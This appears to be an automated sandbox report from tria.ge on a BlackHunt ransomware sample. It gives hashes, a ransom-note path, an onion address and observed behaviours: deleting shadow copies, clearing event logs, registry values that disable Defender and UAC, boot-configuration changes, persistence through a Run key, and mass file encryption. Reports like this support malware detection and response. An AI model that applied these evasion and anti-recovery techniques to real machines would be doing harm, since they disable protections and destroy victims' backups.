Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:51
Static task
static1
Behavioral task
behavioral1
Sample
7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
Resource
win10v2004-20231215-en
General
-
Target
7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
-
Size
707KB
-
MD5
d215e3702125c47834e2d3f4f61bf5e4
-
SHA1
a1f269fb1aca70ad28fa02f17ce63a303e03a8f4
-
SHA256
7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec
-
SHA512
ac7475cb2fbeaa9dc4a2a8c6e378da72e6dd78b4538adbed6f888ddb954f6bccd41f8150293bc77d7088140b501f34cec9863c58d6e1f6efcd73ccab9ba95407
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1I82vnh:6uaTmkZJ+naie5OTamgEoKxLWjIh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1672 fsutil.exe 1208 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection vssvc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" vssvc.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1512 wevtutil.exe 3596 wevtutil.exe 5420 wevtutil.exe 2632 wevtutil.exe 3864 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2948 bcdedit.exe 1276 bcdedit.exe 2760 bcdedit.exe 3036 bcdedit.exe -
Renames multiple (2875) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 564 wbadmin.exe 908 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 5620 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\N: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\T: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\A: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\W: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\H: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\K: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\J: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\L: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\Z: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\P: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\S: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\G: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\B: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\R: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\Y: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\V: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\O: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\I: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\M: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\Q: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened (read-only) \??\U: 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\GMT 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#BlackHunt_Private.key 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\VideoLAN\VLC\lua\#BlackHunt_ReadMe.txt 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#BlackHunt_ReadMe.txt 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.runtime_0.10.0.v201209301036.jar 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\#BlackHunt_ReadMe.hta 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\#BlackHunt_Private.key 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\#BlackHunt_ReadMe.txt 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#BlackHunt_ReadMe.hta 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#BlackHunt_ReadMe.txt 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\7-Zip\Lang\hy.txt 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Lagos 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Jamaica 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kosrae 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\VideoLAN\VLC\plugins\meta_engine\#BlackHunt_ReadMe.txt 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\#BlackHunt_ReadMe.hta 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\DVD Maker\en-US\#BlackHunt_ReadMe.txt 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_VideoInset.png 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\scrapbook.png 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Vostok 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\#BlackHunt_ReadMe.hta 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files (x86)\Google\Update\Install\#BlackHunt_Private.key 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\blackbars80.png 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Adak 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_output\#BlackHunt_ReadMe.hta 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_notes.wmv 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Seoul 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\#BlackHunt_Private.key 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\#BlackHunt_ReadMe.txt 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#BlackHunt_ReadMe.hta 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#BlackHunt_Private.key 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\SuspendCompare.doc 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\15x15dot.png 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fiji 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Currie 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\#BlackHunt_Private.key 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#BlackHunt_Private.key 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_ButtonGraphic.png 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#BlackHunt_ReadMe.txt 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\#BlackHunt_ReadMe.txt 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2720 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 324 vssadmin.exe 2400 vssadmin.exe 1836 vssadmin.exe 1184 vssadmin.exe 1100 vssadmin.exe 3856 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1644 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4108 PING.EXE -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe Token: SeRestorePrivilege 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe Token: SeBackupPrivilege 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe Token: SeTakeOwnershipPrivilege 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe Token: SeAuditPrivilege 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe Token: SeSecurityPrivilege 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe Token: SeIncBasePriorityPrivilege 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe Token: SeBackupPrivilege 1732 vssvc.exe Token: SeRestorePrivilege 1732 vssvc.exe Token: SeAuditPrivilege 1732 vssvc.exe Token: SeBackupPrivilege 3428 wbengine.exe Token: SeRestorePrivilege 3428 wbengine.exe Token: SeSecurityPrivilege 3428 wbengine.exe Token: SeSecurityPrivilege 3596 wevtutil.exe Token: SeBackupPrivilege 3596 wevtutil.exe Token: SeSecurityPrivilege 1512 wevtutil.exe Token: SeBackupPrivilege 1512 wevtutil.exe Token: SeSecurityPrivilege 2632 wevtutil.exe Token: SeBackupPrivilege 2632 wevtutil.exe Token: SeSecurityPrivilege 5420 wevtutil.exe Token: SeBackupPrivilege 5420 wevtutil.exe Token: SeSecurityPrivilege 3864 wevtutil.exe Token: SeBackupPrivilege 3864 wevtutil.exe Token: SeDebugPrivilege 1644 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2208 wrote to memory of 1852 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 29 PID 2208 wrote to memory of 1852 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 29 PID 2208 wrote to memory of 1852 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 29 PID 2208 wrote to memory of 1852 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 29 PID 2208 wrote to memory of 2964 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 31 PID 2208 wrote to memory of 2964 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 31 PID 2208 wrote to memory of 2964 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 31 PID 2208 wrote to memory of 2964 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 31 PID 2208 wrote to memory of 2804 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 33 PID 2208 wrote to memory of 2804 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 33 PID 2208 wrote to memory of 2804 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 33 PID 2208 wrote to memory of 2804 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 33 PID 2208 wrote to memory of 2604 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 132 PID 2208 wrote to memory of 2604 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 132 PID 2208 wrote to memory of 2604 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 132 PID 2208 wrote to memory of 2604 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 132 PID 1852 wrote to memory of 2568 1852 cmd.exe 35 PID 1852 wrote to memory of 2568 1852 cmd.exe 35 PID 1852 wrote to memory of 2568 1852 cmd.exe 35 PID 2208 wrote to memory of 2652 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 38 PID 2208 wrote to memory of 2652 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 38 PID 2208 wrote to memory of 2652 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 38 PID 2208 wrote to memory of 2652 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 38 PID 2964 wrote to memory of 2672 2964 cmd.exe 40 PID 2964 wrote to memory of 2672 2964 cmd.exe 40 PID 2964 wrote to memory of 2672 2964 cmd.exe 40 PID 2208 wrote to memory of 2680 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 41 PID 2208 wrote to memory of 2680 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 41 PID 2208 wrote to memory of 2680 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 41 PID 2208 wrote to memory of 2680 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 41 PID 2208 wrote to memory of 2656 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 42 PID 2208 wrote to memory of 2656 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 42 PID 2208 wrote to memory of 2656 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 42 PID 2208 wrote to memory of 2656 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 42 PID 2208 wrote to memory of 2976 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 44 PID 2208 wrote to memory of 2976 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 44 PID 2208 wrote to memory of 2976 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 44 PID 2208 wrote to memory of 2976 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 44 PID 2208 wrote to memory of 2304 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 46 PID 2208 wrote to memory of 2304 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 46 PID 2208 wrote to memory of 2304 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 46 PID 2208 wrote to memory of 2304 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 46 PID 2804 wrote to memory of 2560 2804 cmd.exe 48 PID 2804 wrote to memory of 2560 2804 cmd.exe 48 PID 2804 wrote to memory of 2560 2804 cmd.exe 48 PID 2208 wrote to memory of 2756 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 50 PID 2208 wrote to memory of 2756 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 50 PID 2208 wrote to memory of 2756 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 50 PID 2208 wrote to memory of 2756 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 50 PID 2208 wrote to memory of 2676 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 52 PID 2208 wrote to memory of 2676 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 52 PID 2208 wrote to memory of 2676 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 52 PID 2208 wrote to memory of 2676 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 52 PID 2208 wrote to memory of 2704 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 56 PID 2208 wrote to memory of 2704 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 56 PID 2208 wrote to memory of 2704 2208 